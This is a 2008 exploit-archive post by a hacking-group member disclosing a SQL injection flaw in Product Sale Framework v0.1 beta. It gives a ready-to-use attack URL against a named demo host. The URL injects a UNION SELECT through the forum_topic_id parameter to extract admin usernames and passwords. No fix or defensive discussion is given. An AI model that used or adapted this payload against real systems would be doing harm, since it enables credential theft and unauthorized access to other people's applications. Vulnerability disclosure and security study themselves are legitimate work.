+++++++++++++++++++++++In The Name Of Allah+++++++++++++++++++++++++++
+ +
+ Product Sale Framework sql injection Vulnerability +
+ +
+ Discovered by b3hz4d +
+ +
+ WwW.DeltaHacking.Net +
+ +
+ +
+ +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
APA Center of Yazd University
(https://www.ircert.cc)
AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)
DATE : 06 Dec 2008
SITE : WwW.DeltaHacking.Net
CONTACT: behzad_sh_66@yahoo.com
#####################################################
APPLICATION : Product Sale Framework v0.1 beta
DOWNLOAD(free): http://www.productsaleframework.com/downloads/psf.zip
VENDOR : http://www.productsaleframework.com
DEMO (links) : http://www.productsaleframework.com
#####################################################
[+] vuln :
customer.forumtopic.php
vulnerability is in froum.all demo link(Admin demo,Affiliate demo,Customer demo) is here:
http://www.productsaleframework.com/
[+] Exploit :
Admin Username and Password:
http://www.kalptarudemos.com/demo/psf/customer/customer.forumtopic.php?forum_topic_id=-1 union select concat(username,0x3a,password),2,3,4,5,6 from psf_config_tb
##########################################################################################################
# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & Snoop-Security.Com #
##########################################################################################################
# milw0rm.com [2008-12-07]